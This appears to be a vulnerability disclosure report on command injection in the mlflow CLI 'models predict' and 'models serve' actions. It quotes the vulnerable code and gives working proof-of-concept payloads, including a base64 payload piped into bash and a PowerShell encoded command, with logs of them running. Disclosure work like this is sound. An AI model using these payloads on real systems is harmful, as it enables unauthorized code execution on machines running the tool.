The mlflow
cli executable is vulnerable to a command injection attack in mlflow models predict
and mlflow models serve
actions. The aforementioned actions is defined in file mlflow\models\cli.py
, and uses a vulnerable predict
and serve
methods of a dynamically resolved instance of PyFuncBackend
class, from a mlflow\pyfunc\backend.py
file.
mlflow models predict
command injectionThe code of the PyFuncBackend.predict
method can be seen below:
def predict(self, model_uri, input_path, output_path, content_type):
"""
Generate predictions using generic python model saved with MLflow. The expected format of
the input JSON is the Mlflow scoring format.
Return the prediction results as a JSON.
"""
local_path = _download_artifact_from_uri(model_uri)
# NB: Absolute windows paths do not work with mlflow apis, use file uri to ensure
# platform compatibility.
local_uri = path_to_local_file_uri(local_path)
if self._env_manager != _EnvManager.LOCAL:
command = (
'python -c "from mlflow.pyfunc.scoring_server import _predict; _predict('
"model_uri={model_uri}, "
"input_path={input_path}, "
"output_path={output_path}, "
"content_type={content_type})"
'"'
).format(
model_uri=repr(local_uri),
input_path=repr(input_path),
output_path=repr(output_path),
content_type=repr(content_type),
)
return self.prepare_env(local_path).execute(command)
else:
scoring_server._predict(local_uri, input_path, output_path, content_type)
The application dynamically constructs a CMD command by injecting the user input into the predefined placeholders, and passes it to the the mlflow.utils.Environment.execute
method, which essentially runs the newly created console command.
The application uses built-in python function repr
to add quotes around the user input. Nonetheless, repr
will not prevent the attacker from injecting a double quote into the CLI parameters to escape from the python -c ""
parameter, as can be seen from the below example:
>>> local_uri='LOCAL_URI'
>>> input_path='INPUT_PATH'
>>> output_path='OUTPUT_PATH'
>>> content_type='injection poc"; we are free now; echo "escape the rest'
>>> command = (
... 'python -c "from mlflow.pyfunc.scoring_server import _predict; _predict('
... "model_uri={model_uri}, "
... "input_path={input_path}, "
... "output_path={output_path}, "
... "content_type={content_type})"
... '"'
... ).format(
... model_uri=repr(local_uri),
... input_path=repr(input_path),
... output_path=repr(output_path),
... content_type=repr(content_type),
... )
>>> print(command)
python -c "from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri='LOCAL_URI', input_path='INPUT_PATH', output_path='OUTPUT_PATH', content_type='injection poc"; we are free now; echo "escape the rest')"
Thus, it is possible to inject arbitrary commands into the parameters of the mlflow models predict
function to obtain an unintended code execution.
mlflow models serve
command injectionThe code of vulnerable PyFuncBackend.serve
method can be seen below.
def serve(
self,
model_uri,
port,
host,
timeout,
enable_mlserver,
synchronous=True,
stdout=None,
stderr=None,
): # pylint: disable=W0221
"""
Serve pyfunc model locally.
"""
local_path = _download_artifact_from_uri(model_uri)
server_implementation = mlserver if enable_mlserver else scoring_server
command, command_env = server_implementation.get_cmd(
local_path, port, host, timeout, self._nworkers
)
...
if self._env_manager != _EnvManager.LOCAL:
return self.prepare_env(local_path).execute(
command,
command_env,
stdout=stdout,
stderr=stderr,
preexec_fn=setup_sigterm_on_parent_death,
synchronous=synchronous,
)
else:
_logger.info("=== Running command '%s'", command)
if os.name != "nt":
command = ["bash", "-c", command]
child_proc = subprocess.Popen(
command,
env=command_env,
preexec_fn=setup_sigterm_on_parent_death,
stdout=stdout,
stderr=stderr,
)
...
The above uses get_cmd
function, defined in mlflow/pyfunc/scoring_server/__init__.py
that directly formats user input into a command string:
def get_cmd(
model_uri: str, port: int = None, host: int = None, timeout: int = None, nworkers: int = None
) -> Tuple[str, Dict[str, str]]:
local_uri = path_to_local_file_uri(model_uri)
timeout = timeout or MLFLOW_SCORING_SERVER_REQUEST_TIMEOUT.get()
# NB: Absolute windows paths do not work with mlflow apis, use file uri to ensure
# platform compatibility.
if os.name != "nt":
args = [f"--timeout={timeout}"]
if port and host:
args.append(f"-b {host}:{port}")
elif host:
args.append(f"-b {host}")
if nworkers:
args.append(f"-w {nworkers}")
command = (
f"gunicorn {' '.join(args)} ${{GUNICORN_CMD_ARGS}}"
" -- mlflow.pyfunc.scoring_server.wsgi:app"
)
else:
args = []
if host:
args.append(f"--host={host}")
if port:
args.append(f"--port={port}")
command = (
f"waitress-serve {' '.join(args)} "
"--ident=mlflow mlflow.pyfunc.scoring_server.wsgi:app"
)
command_env = os.environ.copy()
command_env[_SERVER_MODEL_PATH] = local_uri
return command, command_env
Install the latest version of mlflow
pip install mlflow
Install pyenv
or conda
(prerequisites to get mlflow models predict
command to work with non local environments.
OR
Clone the mlflow repository into a local directory
git clone https://github.com/mlflow/mlflow
Run one of the example mlflow scripts that save a model, e.g. examples/sklearn_logistic_regression/train.py
to populate the mlruns
directory:
cd mlflow/examples/sklearn_logistic_regression
python train.py
List files inside mlruns/0/
directory to get a valid run ID
ls -l mlruns/0/
total 8
drwxrwxr-x 6 ubuntu ubuntu 4096 Apr 29 19:28 330068e1dfcf43cb8f1cd0e86038d781 # use this id
-rw-rw-r-- 1 ubuntu ubuntu 227 Apr 29 19:28 meta.yaml
Insert the below payload into input path (-i
), output path (-o
), or type (-t
) parameters:
"; YOUR COMMAND HERE; echo "
For example:
mlflow models predict -m 'runs:/330068e1dfcf43cb8f1cd0e86038d781/model/' -i 'test"; id; echo "' -o test
2023/04/29 19:48:00 INFO mlflow.models.flavor_backend_registry: Selected backend for flavor 'python_function'
2023/04/29 19:48:00 INFO mlflow.utils.virtualenv: Installing python 3.10.6 if it does not exist
2023/04/29 19:48:00 INFO mlflow.utils.virtualenv: Environment /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b already exists
2023/04/29 19:48:00 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && python -c ""']'
2023/04/29 19:48:00 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && python -c "from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri=\'file:///home/ubuntu/Desktop/projects/mlflow/examples/sklearn_logistic_regression/mlruns/0/330068e1dfcf43cb8f1cd0e86038d781/artifacts/model\', input_path=\'test"; id; echo "\', output_path=\'test\', content_type=\'json\')"']'
File "<string>", line 1
from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri='file:///home/ubuntu/Desktop/projects/mlflow/examples/sklearn_logistic_regression/mlruns/0/330068e1dfcf43cb8f1cd0e86038d781/artifacts/model', input_path='test
^
SyntaxError: unterminated string literal (detected at line 1)
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),135(lxd),136(sambashare)
', output_path='test', content_type='json')
If you want to perform some advanced commands that require use of any quotes, you may want to encode your input beforehand.
Injecting advanced payloads for Linux & virtualenv env manager:
# example of encoding a payload to echo "hello from mlflow rce" & run the "id" --env-manager virtualenv
echo 'echo "hello from mlflow rce!"; id;' | base64
# encoded payload
ZWNobyAiaGVsbG8gZnJvbSBtbGZsb3cgcmNlISI7IGlkOwo=
# poc
$ mlflow models predict -m 'runs:/RUN_ID/model/' -i 'test"; echo ZWNobyAiaGVsbG8gZnJvbSBtbGZsb3cgcmNlISI7IGlkOwo= | base64 -d | bash; echo "' -o test
2023/04/29 20:09:37 INFO mlflow.models.flavor_backend_registry: Selected backend for flavor 'python_function'
2023/04/29 20:09:37 INFO mlflow.utils.virtualenv: Installing python 3.10.6 if it does not exist
2023/04/29 20:09:37 INFO mlflow.utils.virtualenv: Environment /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b already exists
2023/04/29 20:09:37 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && python -c ""']'
2023/04/29 20:09:37 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && python -c "from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri=\'file:///home/ubuntu/Desktop/projects/mlflow/examples/sklearn_logistic_regression/mlruns/0/330068e1dfcf43cb8f1cd0e86038d781/artifacts/model\', input_path=\'test"; echo ZWNobyAiaGVsbG8gZnJvbSBtbGZsb3cgcmNlISI7IGlkOwo= | base64 -d | bash; echo "\', output_path=\'test\', content_type=\'json\')"']'
File "<string>", line 1
from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri='file:///home/ubuntu/Desktop/projects/mlflow/examples/sklearn_logistic_regression/mlruns/0/330068e1dfcf43cb8f1cd0e86038d781/artifacts/model', input_path='test
^
SyntaxError: unterminated string literal (detected at line 1)
hello from mlflow rce!
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),135(lxd),136(sambashare)
', output_path='test', content_type='json')
Injecting advanced payloads for for Windows & conda env manager:
# example of encoding a payload to echo "hello from mlflow rce" & run the "whoami /all"
https://gchq.github.io/CyberChef/#recipe=Encode_text('UTF-16LE%20(1200)')To_Base64('A-Za-z0-9%2B/%3D')&input=ZWNobyAiaGVsbG8gZnJvbSBtbGZsb3cgcmNlIjsgd2hvYW1pIC9hbGw
# encoded payload
ZQBjAGgAbwAgACIAaABlAGwAbABvACAAZgByAG8AbQAgAG0AbABmAGwAbwB3ACAAcgBjAGUAIgA7ACAAdwBoAG8AYQBtAGkAIAAvAGEAbABsAA==
# poc
(base) C:\Temp\mlflow\examples\sklearn_logistic_regression>mlflow models predict --env-manager conda -m mlruns/0/ef785deed8c04b41b88369d777cf1bf8/artifacts/model -i "test"" & powershell -ec ZQBjAGgAbwAgACIAaABlAGwAbABvACAAZgByAG8AbQAgAG0AbABmAGwAbwB3ACAAcgBjAGUAIgA7ACAAdwBoAG8AYQBtAGkAIAAvAGEAbABsAA== & echo "" " -o test -t json
C:\Users\Strawberry\miniconda3\lib\site-packages\click\core.py:2322: UserWarning: Use of conda is discouraged. If you use it, please ensure that your use of conda complies with Anaconda's terms of service (https://legal.anaconda.com/policies/en/?name=terms-of-service). virtualenv is the recommended tool for environment reproducibility. To suppress this warning, set the MLFLOW_DISABLE_ENV_MANAGER_CONDA_WARNING (default: False, type: bool) environment variable to 'TRUE'.
value = self.callback(ctx, self, value)
2023/04/30 02:32:40 INFO mlflow.models.flavor_backend_registry: Selected backend for flavor 'python_function'
2023/04/30 02:32:43 INFO mlflow.utils.conda: Conda environment mlflow-a90f7522e7a3d8452e89ff3700e8e21d677beb9e already exists.
2023/04/30 02:32:43 INFO mlflow.utils.environment: === Running command '['cmd', '/c', 'conda activate mlflow-a90f7522e7a3d8452e89ff3700e8e21d677beb9e & python -c ""']'
2023/04/30 02:32:43 INFO mlflow.utils.environment: === Running command '['cmd', '/c', 'conda activate mlflow-a90f7522e7a3d8452e89ff3700e8e21d677beb9e & python -c "from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri=\'file:///C:/Users/Strawberry/Desktop/projects/mlflow/examples/sklearn_logistic_regression/mlruns/0/ef785deed8c04b41b88369d777cf1bf8/artifacts/model\', input_path=\'test" & powershell -ec ZQBjAGgAbwAgACIAaABlAGwAbABvACAAZgByAG8AbQAgAG0AbABmAGwAbwB3ACAAcgBjAGUAIgA7ACAAdwBoAG8AYQBtAGkAIAAvAGEAbABsAA== & echo " \', output_path=\'test\', content_type=\'json\')"']'
File "<string>", line 1
"from
^
SyntaxError: unterminated string literal (detected at line 1)
hello from mlflow rce
USER INFORMATION
----------------
User Name SID
========================== =============================================
desktop-0gd1eqg\strawberry S-1-5-21-2872549777-3506415077-326829181-1001
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================================= ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114 Group used for deny only
DESKTOP-0GD1EQG\docker-users Alias S-1-5-21-2872549777-3506415077-326829181-1005 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Group used for deny only
BUILTIN\Hyper-V Administrators Alias S-1-5-32-578 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users Alias S-1-5-32-559 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
\" ', output_path='test', content_type='json')\"
Insert the command injection payload into the -h
(--host
) parameter:
mlflow models serve -m 'runs:/330068e1dfcf43cb8f1cd0e86038d781/model/' -p '80' -h 'localhost & id & localhost'
2023/04/30 11:51:07 INFO mlflow.models.flavor_backend_registry: Selected backend for flavor 'python_function'
2023/04/30 11:51:07 INFO mlflow.utils.virtualenv: Installing python 3.10.6 if it does not exist
2023/04/30 11:51:07 INFO mlflow.utils.virtualenv: Environment /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b already exists
2023/04/30 11:51:07 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && python -c ""']'
2023/04/30 11:51:07 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && exec gunicorn --timeout=60 -b localhost & id & localhost:80 -w 1 ${GUNICORN_CMD_ARGS} -- mlflow.pyfunc.scoring_server.wsgi:app']'
...
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),135(lxd),136(sambashare)
...